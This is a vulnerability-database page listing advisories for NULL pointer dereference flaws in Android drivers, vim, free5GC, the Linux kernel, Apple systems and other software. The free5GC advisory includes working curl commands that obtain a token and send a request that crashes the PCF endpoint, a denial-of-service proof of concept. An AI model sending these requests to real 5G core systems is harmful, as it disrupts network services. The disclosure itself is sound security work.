CWE-476
AllowedNULL Pointer Dereference
Abstraction: Base · Status: Stable
The product dereferences a pointer that it expects to be valid but is NULL.
6310 vulnerabilities reference this CWE, most recent first.
GHSA-WW8J-FMC9-8J4H
Vulnerability from github – Published: 2022-05-17 03:28 – Updated: 2022-05-17 03:28drivers/video/msm/mdss/mdss_mdp_pp.c in the Qualcomm MDSS driver in Android before 2016-10-05 allows attackers to cause a denial of service (invalid pointer access) or possibly have unspecified other impact via unknown vectors, aka Qualcomm internal bug CR 1004933.
{
"affected": [],
"aliases": [
"CVE-2016-6692"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-10-10T11:00:00Z",
"severity": "CRITICAL"
},
"details": "drivers/video/msm/mdss/mdss_mdp_pp.c in the Qualcomm MDSS driver in Android before 2016-10-05 allows attackers to cause a denial of service (invalid pointer access) or possibly have unspecified other impact via unknown vectors, aka Qualcomm internal bug CR 1004933.",
"id": "GHSA-ww8j-fmc9-8j4h",
"modified": "2022-05-17T03:28:59Z",
"published": "2022-05-17T03:28:59Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6692"
},
{
"type": "WEB",
"url": "https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=0f0e7047d39f9fb3a1a7f389918ff79cdb4a50b3"
},
{
"type": "WEB",
"url": "http://source.android.com/security/bulletin/2016-10-01.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/93330"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WWJG-4JV2-95W2
Vulnerability from github – Published: 2022-06-29 00:00 – Updated: 2022-07-09 00:00NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.
{
"affected": [],
"aliases": [
"CVE-2022-2231"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-06-28T20:15:00Z",
"severity": "MODERATE"
},
"details": "NULL Pointer Dereference in GitHub repository vim/vim prior to 8.2.",
"id": "GHSA-wwjg-4jv2-95w2",
"modified": "2022-07-09T00:00:25Z",
"published": "2022-06-29T00:00:24Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-2231"
},
{
"type": "WEB",
"url": "https://github.com/vim/vim/commit/79481367a457951aabd9501b510fd7e3eb29c3d8"
},
{
"type": "WEB",
"url": "https://huntr.dev/bounties/8dae6ab4-7a7a-4716-a65c-9b090fa057b5"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GFD2A4YLBR7OIRHTL7CK6YNMEIQ264CN"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U743FMJGFQ35GBPCQ6OWMVZEJPDFVEWM"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202208-32"
},
{
"type": "WEB",
"url": "https://security.gentoo.org/glsa/202305-16"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WWQH-7JM5-GJ7W
Vulnerability from github – Published: 2026-05-08 22:40 – Updated: 2026-06-08 23:47Summary
free5GC's PCF POST /npcf-policyauthorization/v1/app-sessions handler panics on a single authenticated request whose ascReqData.suppFeat == "1" (enabling traffic-routing feature negotiation) and whose medComponents entries supply an afAppId but NO AfRoutReq. The create path then calls provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, ...) with routeReq == nil and dereferences routeReq.RouteToLocs (and other fields) without a nil check, causing runtime error: invalid memory address or nil pointer dereference. Gin recovery converts the panic into HTTP 500.
The trigger is a single valid authenticated request -- changing only suppFeat from "0" to "1" flips the same shape of POST from a normal 201 Created into a panic-driven 500.
This endpoint requires a valid npcf-policyauthorization OAuth2 access token (PR:L). The PCF process is not killed (Gin recovers); the realized impact is per-request panic-DoS on the app-session create path.
Details
Validated against the PCF container in the official Docker compose lab.
- Source repo tag: v4.2.1
- PCF endpoint: http://10.100.200.9:8000
- Validation date: 2026-03-12
Vulnerable handler path:
postAppSessCtxProcedure
-> medComponents loop
-> appID := medComp.AfAppId
routeReq := medComp.AfRoutReq // nil when AfRoutReq absent
provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, medComp.FStatus)
In provisioningOfTrafficRoutingInfo, routeReq.RouteToLocs, routeReq.UpPathChgSub, and routeReq.AppReloc are dereferenced directly without a nil check. When suppFeat is "0" the traffic-routing branch is not entered and the same input shape returns 201 Created; when suppFeat is "1" the branch is entered and the nil-deref fires.
Code evidence (paths in free5gc/pcf):
- Affected route + dispatch: NFs/pcf/internal/sbi/api_policyauthorization.go
- Create handler path: NFs/pcf/internal/sbi/processor/policyauthorization.go
- Call site that passes nil routeReq into the traffic-routing helper: NFs/pcf/internal/sbi/processor/policyauthorization.go
- Panic site (nil deref of routeReq.* fields): NFs/pcf/internal/sbi/processor/policyauthorization.go:1740
PoC
Reproduced end-to-end against the running PCF at http://10.100.200.9:8000.
- Obtain a valid
npcf-policyauthorizationtoken from NRF:
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=b84c4f0a-6010-4972-8480-e44e625b9ee4&targetNfType=PCF&scope=npcf-policyauthorization'
- Trigger the panic with a single valid authenticated POST whose
ascReqData.suppFeat == "1",medComponentssuppliesafAppId, andAfRoutReqis absent:
curl -i -X POST 'http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <valid_npcf_policyauthorization_jwt>' \
--data '{"ascReqData":{"suppFeat":"1","notifUri":"http://127.0.0.1:9999/appsess","ueIpv4":"10.60.0.3","dnn":"internet","medComponents":{"1":{"medCompN":1,"afAppId":"app1"}}}}'
HTTP/1.1 500 Internal Server Error
- Control comparison -- same request shape but
suppFeat="0"-> normal201 Created:
curl -i -X POST 'http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <valid_npcf_policyauthorization_jwt>' \
--data '{"ascReqData":{"suppFeat":"0","notifUri":"http://127.0.0.1:9999/appsess","ueIpv4":"10.60.0.3","dnn":"internet","medComponents":{"1":{"medCompN":1,"afAppId":"app1"}}}}'
HTTP/1.1 201 Created
- PCF container logs show the panic stack landing in
provisioningOfTrafficRoutingInfowithrouteReq = 0x0:
[ERRO][PCF][GIN] panic: runtime error: invalid memory address or nil pointer dereference
github.com/free5gc/pcf/internal/sbi/processor.provisioningOfTrafficRoutingInfo(..., 0x0, ...)
.../policyauthorization.go:1740
github.com/free5gc/pcf/internal/sbi/processor.(*Processor).postAppSessCtxProcedure
.../policyauthorization.go:288
github.com/free5gc/pcf/internal/sbi/processor.(*Processor).HandlePostAppSessionsContext
.../policyauthorization.go:139
github.com/free5gc/pcf/internal/sbi.(*Server).HTTPPostAppSessions
.../api_policyauthorization.go:119
[INFO][PCF][GIN] | 500 | POST | /npcf-policyauthorization/v1/app-sessions |
Impact
NULL pointer dereference (CWE-476) caused by improper handling of an exceptional branch (CWE-754): the create path passes routeReq straight into provisioningOfTrafficRoutingInfo without a nil check, even though medComp.AfRoutReq is optional and is nil for the demonstrated valid input shape. The control experiment with suppFeat="0" proves the request shape itself is otherwise valid.
Gin recovery catches the panic, so the PCF process is NOT killed and other endpoints continue serving. The realized impact is per-request: any authenticated POST against this endpoint with suppFeat="1" and medComponents.*.AfAppId set but AfRoutReq absent returns HTTP 500 with empty body and a stack trace in PCF logs.
Any party that holds (or can obtain) a valid npcf-policyauthorization token can repeatedly drive this code path to sustain a per-request panic-DoS on the app-session create endpoint, with each panic costing more CPU + log writes than the intended controlled response would have.
No Confidentiality impact (the response is 500 with empty body). No persistent Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation.
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/879 Upstream fix: https://github.com/free5gc/pcf/pull/65
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/free5gc/pcf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44317"
],
"database_specific": {
"cwe_ids": [
"CWE-476",
"CWE-754"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T22:40:11Z",
"nvd_published_at": "2026-05-27T17:16:36Z",
"severity": "MODERATE"
},
"details": "### Summary\nfree5GC\u0027s PCF `POST /npcf-policyauthorization/v1/app-sessions` handler panics on a single authenticated request whose `ascReqData.suppFeat == \"1\"` (enabling traffic-routing feature negotiation) and whose `medComponents` entries supply an `afAppId` but NO `AfRoutReq`. The create path then calls `provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, ...)` with `routeReq == nil` and dereferences `routeReq.RouteToLocs` (and other fields) without a nil check, causing `runtime error: invalid memory address or nil pointer dereference`. Gin recovery converts the panic into `HTTP 500`.\n\nThe trigger is a single valid authenticated request -- changing only `suppFeat` from `\"0\"` to `\"1\"` flips the same shape of POST from a normal `201 Created` into a panic-driven `500`.\n\nThis endpoint requires a valid `npcf-policyauthorization` OAuth2 access token (PR:L). The PCF process is not killed (Gin recovers); the realized impact is per-request panic-DoS on the app-session create path.\n\n### Details\nValidated against the PCF container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- PCF endpoint: `http://10.100.200.9:8000`\n- Validation date: 2026-03-12\n\nVulnerable handler path:\n```\npostAppSessCtxProcedure\n -\u003e medComponents loop\n -\u003e appID := medComp.AfAppId\n routeReq := medComp.AfRoutReq // nil when AfRoutReq absent\n provisioningOfTrafficRoutingInfo(smPolicy, appID, routeReq, medComp.FStatus)\n```\n\nIn `provisioningOfTrafficRoutingInfo`, `routeReq.RouteToLocs`, `routeReq.UpPathChgSub`, and `routeReq.AppReloc` are dereferenced directly without a nil check. When `suppFeat` is `\"0\"` the traffic-routing branch is not entered and the same input shape returns `201 Created`; when `suppFeat` is `\"1\"` the branch is entered and the nil-deref fires.\n\nCode evidence (paths in `free5gc/pcf`):\n- Affected route + dispatch: `NFs/pcf/internal/sbi/api_policyauthorization.go`\n- Create handler path: `NFs/pcf/internal/sbi/processor/policyauthorization.go`\n- Call site that passes nil `routeReq` into the traffic-routing helper: `NFs/pcf/internal/sbi/processor/policyauthorization.go`\n- Panic site (nil deref of `routeReq.*` fields): `NFs/pcf/internal/sbi/processor/policyauthorization.go:1740`\n\n### PoC\nReproduced end-to-end against the running PCF at `http://10.100.200.9:8000`.\n\n1. Obtain a valid `npcf-policyauthorization` token from NRF:\n```\ncurl -sS -X POST \u0027http://10.100.200.3:8000/oauth2/token\u0027 \\\n -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n --data \u0027grant_type=client_credentials\u0026nfType=NEF\u0026nfInstanceId=b84c4f0a-6010-4972-8480-e44e625b9ee4\u0026targetNfType=PCF\u0026scope=npcf-policyauthorization\u0027\n```\n\n2. Trigger the panic with a single valid authenticated POST whose `ascReqData.suppFeat == \"1\"`, `medComponents` supplies `afAppId`, and `AfRoutReq` is absent:\n```\ncurl -i -X POST \u0027http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -H \u0027Authorization: Bearer \u003cvalid_npcf_policyauthorization_jwt\u003e\u0027 \\\n --data \u0027{\"ascReqData\":{\"suppFeat\":\"1\",\"notifUri\":\"http://127.0.0.1:9999/appsess\",\"ueIpv4\":\"10.60.0.3\",\"dnn\":\"internet\",\"medComponents\":{\"1\":{\"medCompN\":1,\"afAppId\":\"app1\"}}}}\u0027\n```\n```\nHTTP/1.1 500 Internal Server Error\n```\n\n3. Control comparison -- same request shape but `suppFeat=\"0\"` -\u003e normal `201 Created`:\n```\ncurl -i -X POST \u0027http://10.100.200.9:8000/npcf-policyauthorization/v1/app-sessions\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -H \u0027Authorization: Bearer \u003cvalid_npcf_policyauthorization_jwt\u003e\u0027 \\\n --data \u0027{\"ascReqData\":{\"suppFeat\":\"0\",\"notifUri\":\"http://127.0.0.1:9999/appsess\",\"ueIpv4\":\"10.60.0.3\",\"dnn\":\"internet\",\"medComponents\":{\"1\":{\"medCompN\":1,\"afAppId\":\"app1\"}}}}\u0027\n```\n```\nHTTP/1.1 201 Created\n```\n\n4. PCF container logs show the panic stack landing in `provisioningOfTrafficRoutingInfo` with `routeReq = 0x0`:\n```\n[ERRO][PCF][GIN] panic: runtime error: invalid memory address or nil pointer dereference\n github.com/free5gc/pcf/internal/sbi/processor.provisioningOfTrafficRoutingInfo(..., 0x0, ...)\n .../policyauthorization.go:1740\n github.com/free5gc/pcf/internal/sbi/processor.(*Processor).postAppSessCtxProcedure\n .../policyauthorization.go:288\n github.com/free5gc/pcf/internal/sbi/processor.(*Processor).HandlePostAppSessionsContext\n .../policyauthorization.go:139\n github.com/free5gc/pcf/internal/sbi.(*Server).HTTPPostAppSessions\n .../api_policyauthorization.go:119\n[INFO][PCF][GIN] | 500 | POST | /npcf-policyauthorization/v1/app-sessions |\n```\n\n### Impact\nNULL pointer dereference (CWE-476) caused by improper handling of an exceptional branch (CWE-754): the create path passes `routeReq` straight into `provisioningOfTrafficRoutingInfo` without a nil check, even though `medComp.AfRoutReq` is optional and is nil for the demonstrated valid input shape. The control experiment with `suppFeat=\"0\"` proves the request shape itself is otherwise valid.\n\nGin recovery catches the panic, so the PCF process is NOT killed and other endpoints continue serving. The realized impact is per-request: any authenticated POST against this endpoint with `suppFeat=\"1\"` and `medComponents.*.AfAppId` set but `AfRoutReq` absent returns `HTTP 500` with empty body and a stack trace in PCF logs.\n\nAny party that holds (or can obtain) a valid `npcf-policyauthorization` token can repeatedly drive this code path to sustain a per-request panic-DoS on the app-session create endpoint, with each panic costing more CPU + log writes than the intended controlled response would have.\n\nNo Confidentiality impact (the response is `500` with empty body). No persistent Integrity impact (the panic happens before any state mutation). Availability impact is limited to per-request degradation.\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/879\nUpstream fix: https://github.com/free5gc/pcf/pull/65",
"id": "GHSA-wwqh-7jm5-gj7w",
"modified": "2026-06-08T23:47:08Z",
"published": "2026-05-08T22:40:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-wwqh-7jm5-gj7w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44317"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/issues/879"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/pcf/pull/65"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/pcf/commit/508d70b8527a6c8c923179dad450ea01e16b6aeb"
},
{
"type": "PACKAGE",
"url": "https://github.com/free5gc/free5gc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "free5GC\u0027s PCF npcf-policyauthorization POST /app-sessions panics on suppFeat=1 with missing AfRoutReq via nil pointer dereference"
}
GHSA-WWW7-FG82-Q962
Vulnerability from github – Published: 2023-03-25 12:30 – Updated: 2023-03-31 03:30A vulnerability, which was classified as problematic, was found in Jianming Antivirus 16.2.2022.418. This affects an unknown part in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-224013 was assigned to this vulnerability.
{
"affected": [],
"aliases": [
"CVE-2023-1631"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-03-25T12:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability, which was classified as problematic, was found in Jianming Antivirus 16.2.2022.418. This affects an unknown part in the library kvcore.sys of the component IoControlCode Handler. The manipulation leads to null pointer dereference. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The identifier VDB-224013 was assigned to this vulnerability.",
"id": "GHSA-www7-fg82-q962",
"modified": "2023-03-31T03:30:31Z",
"published": "2023-03-25T12:30:48Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1631"
},
{
"type": "WEB",
"url": "https://drive.google.com/file/d/1Div9mElTdsluLrU2etziLYqmXcqQFj1j/view"
},
{
"type": "WEB",
"url": "https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/CVE-2023-1631"
},
{
"type": "WEB",
"url": "https://github.com/zeze-zeze/WindowsKernelVuln/tree/master/unassigned30"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.224013"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.224013"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WWWQ-67R3-G4QJ
Vulnerability from github – Published: 2022-05-14 03:29 – Updated: 2022-05-14 03:29In the video_ioctl2() function in the camera driver in Android for MSM, Firefox OS for MSM, and QRD Android before 2017-09-16, an untrusted pointer dereference may potentially occur.
{
"affected": [],
"aliases": [
"CVE-2017-15846"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-03-30T21:29:00Z",
"severity": "HIGH"
},
"details": "In the video_ioctl2() function in the camera driver in Android for MSM, Firefox OS for MSM, and QRD Android before 2017-09-16, an untrusted pointer dereference may potentially occur.",
"id": "GHSA-wwwq-67r3-g4qj",
"modified": "2022-05-14T03:29:34Z",
"published": "2022-05-14T03:29:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15846"
},
{
"type": "WEB",
"url": "https://source.android.com/security/bulletin/pixel/2018-02-01"
},
{
"type": "WEB",
"url": "https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=9fdbd92ec9196ba3629f68f4c22342aa6eedc960"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WX3J-J8RQ-8W37
Vulnerability from github – Published: 2025-07-03 09:30 – Updated: 2025-11-20 21:30In the Linux kernel, the following vulnerability has been resolved:
watchdog: lenovo_se30_wdt: Fix possible devm_ioremap() NULL pointer dereference in lenovo_se30_wdt_probe()
devm_ioremap() returns NULL on error. Currently, lenovo_se30_wdt_probe() does not check for this case, which results in a NULL pointer dereference.
Add NULL check after devm_ioremap() to prevent this issue.
{
"affected": [],
"aliases": [
"CVE-2025-38144"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-03T09:15:29Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwatchdog: lenovo_se30_wdt: Fix possible devm_ioremap() NULL pointer dereference in lenovo_se30_wdt_probe()\n\ndevm_ioremap() returns NULL on error. Currently, lenovo_se30_wdt_probe()\ndoes not check for this case, which results in a NULL pointer\ndereference.\n\nAdd NULL check after devm_ioremap() to prevent this issue.",
"id": "GHSA-wx3j-j8rq-8w37",
"modified": "2025-11-20T21:30:30Z",
"published": "2025-07-03T09:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38144"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/57f7a1da0ec06d8579accaf77762d0128d13e4af"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/a4e2401438a26131ecff9be6a3a1d4cbfea66f9a"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WX63-46G2-GH4C
Vulnerability from github – Published: 2022-05-14 03:19 – Updated: 2022-05-14 03:19NULL pointer dereference in the _fields_add function in fields.c in libbibcore.a in bibutils through 6.2 allows remote attackers to cause a denial of service (application crash), as demonstrated by end2xml.
{
"affected": [],
"aliases": [
"CVE-2018-10775"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-05-07T07:29:00Z",
"severity": "MODERATE"
},
"details": "NULL pointer dereference in the _fields_add function in fields.c in libbibcore.a in bibutils through 6.2 allows remote attackers to cause a denial of service (application crash), as demonstrated by end2xml.",
"id": "GHSA-wx63-46g2-gh4c",
"modified": "2022-05-14T03:19:06Z",
"published": "2022-05-14T03:19:06Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2018-10775"
},
{
"type": "WEB",
"url": "https://drive.google.com/drive/u/1/folders/1qtq272m7jJaEUPGFLvyXmIl5zNJv7rd1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WX6Q-H4Q7-3XRP
Vulnerability from github – Published: 2022-05-14 01:16 – Updated: 2022-05-14 01:16IOHIDFamily in Apple iOS before 9.3.3, OS X before 10.11.6, tvOS before 9.2.2, and watchOS before 2.2.2 allows local users to gain privileges or cause a denial of service (NULL pointer dereference) via unspecified vectors.
{
"affected": [],
"aliases": [
"CVE-2016-4626"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-07-22T02:59:00Z",
"severity": "HIGH"
},
"details": "IOHIDFamily in Apple iOS before 9.3.3, OS X before 10.11.6, tvOS before 9.2.2, and watchOS before 2.2.2 allows local users to gain privileges or cause a denial of service (NULL pointer dereference) via unspecified vectors.",
"id": "GHSA-wx6q-h4q7-3xrp",
"modified": "2022-05-14T01:16:55Z",
"published": "2022-05-14T01:16:55Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-4626"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT206902"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT206903"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT206904"
},
{
"type": "WEB",
"url": "https://support.apple.com/HT206905"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2016/Jul/msg00000.html"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2016/Jul/msg00001.html"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2016/Jul/msg00002.html"
},
{
"type": "WEB",
"url": "http://lists.apple.com/archives/security-announce/2016/Jul/msg00003.html"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/91834"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1036344"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-WX79-2Q2C-86QM
Vulnerability from github – Published: 2025-09-23 21:30 – Updated: 2025-09-23 21:30In the Linux kernel, the following vulnerability has been resolved:
clk: qcom: ipq8074: fix PCI-E clock oops
Fix PCI-E clock related kernel oops that are caused by a missing clock parent.
pcie0_rchng_clk_src has num_parents set to 2 but only one parent is actually set via parent_hws, it should also have "XO" defined. This will cause the kernel to panic on a NULL pointer in clk_core_get_parent_by_index().
So, to fix this utilize clk_parent_data to provide gcc_xo_gpll0 parent data. Since there is already an existing static const char * const gcc_xo_gpll0[] used to provide the same parents via parent_names convert those users to clk_parent_data as well.
Without this earlycon is needed to even catch the OOPS as it will reset the board before serial is initialized with the following:
[ 0.232279] Unable to handle kernel paging request at virtual address 0000a00000000000 [ 0.232322] Mem abort info: [ 0.239094] ESR = 0x96000004 [ 0.241778] EC = 0x25: DABT (current EL), IL = 32 bits [ 0.244908] SET = 0, FnV = 0 [ 0.250377] EA = 0, S1PTW = 0 [ 0.253236] FSC = 0x04: level 0 translation fault [ 0.256277] Data abort info: [ 0.261141] ISV = 0, ISS = 0x00000004 [ 0.264262] CM = 0, WnR = 0 [ 0.267820] [0000a00000000000] address between user and kernel address ranges [ 0.270954] Internal error: Oops: 96000004 [#1] SMP [ 0.278067] Modules linked in: [ 0.282751] CPU: 1 PID: 1 Comm: swapper/0 Not tainted 5.15.10 #0 [ 0.285882] Hardware name: Xiaomi AX3600 (DT) [ 0.292043] pstate: 20400005 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 0.296299] pc : clk_core_get_parent_by_index+0x68/0xec [ 0.303067] lr : __clk_register+0x1d8/0x820 [ 0.308273] sp : ffffffc01111b7d0 [ 0.312438] x29: ffffffc01111b7d0 x28: 0000000000000000 x27: 0000000000000040 [ 0.315919] x26: 0000000000000002 x25: 0000000000000000 x24: ffffff8000308800 [ 0.323037] x23: ffffff8000308850 x22: ffffff8000308880 x21: ffffff8000308828 [ 0.330155] x20: 0000000000000028 x19: ffffff8000309700 x18: 0000000000000020 [ 0.337272] x17: 000000005cc86990 x16: 0000000000000004 x15: ffffff80001d9d0a [ 0.344391] x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000006 [ 0.351508] x11: 0000000000000003 x10: 0101010101010101 x9 : 0000000000000000 [ 0.358626] x8 : 7f7f7f7f7f7f7f7f x7 : 6468626f5e626266 x6 : 17000a3a403c1b06 [ 0.365744] x5 : 061b3c403a0a0017 x4 : 0000000000000000 x3 : 0000000000000001 [ 0.372863] x2 : 0000a00000000000 x1 : 0000000000000001 x0 : ffffff8000309700 [ 0.379982] Call trace: [ 0.387091] clk_core_get_parent_by_index+0x68/0xec [ 0.389351] __clk_register+0x1d8/0x820 [ 0.394210] devm_clk_hw_register+0x5c/0xe0 [ 0.398030] devm_clk_register_regmap+0x44/0x8c [ 0.402198] qcom_cc_really_probe+0x17c/0x1d0 [ 0.406711] qcom_cc_probe+0x34/0x44 [ 0.411224] gcc_ipq8074_probe+0x18/0x30 [ 0.414869] platform_probe+0x68/0xe0 [ 0.418776] really_probe.part.0+0x9c/0x30c [ 0.422336] __driver_probe_device+0x98/0x144 [ 0.426329] driver_probe_device+0x44/0x11c [ 0.430842] __device_attach_driver+0xb4/0x120 [ 0.434836] bus_for_each_drv+0x68/0xb0 [ 0.439349] __device_attach+0xb0/0x170 [ 0.443081] device_initial_probe+0x14/0x20 [ 0.446901] bus_probe_device+0x9c/0xa4 [ 0.451067] device_add+0x35c/0x834 [ 0.454886] of_device_add+0x54/0x64 [ 0.458360] of_platform_device_create_pdata+0xc0/0x100 [ 0.462181] of_platform_bus_create+0x114/0x370 [ 0.467128] of_platform_bus_create+0x15c/0x370 [ 0.471641] of_platform_populate+0x50/0xcc [ 0.476155] of_platform_default_populate_init+0xa8/0xc8 [ 0.480324] do_one_initcall+0x50/0x1b0 [ 0.485877] kernel_init_freeable+0x234/0x29c [ 0.489436] kernel_init+0x24/0x120 [ 0.493948] ret_from_fork+0x10/0x20 [ 0.497253] Code: d50323bf d65f03c0 f94002a2 b4000302 (f9400042) [ 0.501079] ---[ end trace 4ca7e1129da2abce ]---
{
"affected": [],
"aliases": [
"CVE-2021-47647"
],
"database_specific": {
"cwe_ids": [
"CWE-476"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-26T06:37:06Z",
"severity": "MODERATE"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: qcom: ipq8074: fix PCI-E clock oops\n\nFix PCI-E clock related kernel oops that are caused by a missing clock\nparent.\n\npcie0_rchng_clk_src has num_parents set to 2 but only one parent is\nactually set via parent_hws, it should also have \"XO\" defined.\nThis will cause the kernel to panic on a NULL pointer in\nclk_core_get_parent_by_index().\n\nSo, to fix this utilize clk_parent_data to provide gcc_xo_gpll0 parent\ndata.\nSince there is already an existing static const char * const gcc_xo_gpll0[]\nused to provide the same parents via parent_names convert those users to\nclk_parent_data as well.\n\nWithout this earlycon is needed to even catch the OOPS as it will reset\nthe board before serial is initialized with the following:\n\n[ 0.232279] Unable to handle kernel paging request at virtual address 0000a00000000000\n[ 0.232322] Mem abort info:\n[ 0.239094] ESR = 0x96000004\n[ 0.241778] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 0.244908] SET = 0, FnV = 0\n[ 0.250377] EA = 0, S1PTW = 0\n[ 0.253236] FSC = 0x04: level 0 translation fault\n[ 0.256277] Data abort info:\n[ 0.261141] ISV = 0, ISS = 0x00000004\n[ 0.264262] CM = 0, WnR = 0\n[ 0.267820] [0000a00000000000] address between user and kernel address ranges\n[ 0.270954] Internal error: Oops: 96000004 [#1] SMP\n[ 0.278067] Modules linked in:\n[ 0.282751] CPU: 1 PID: 1 Comm: swapper/0 Not tainted 5.15.10 #0\n[ 0.285882] Hardware name: Xiaomi AX3600 (DT)\n[ 0.292043] pstate: 20400005 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 0.296299] pc : clk_core_get_parent_by_index+0x68/0xec\n[ 0.303067] lr 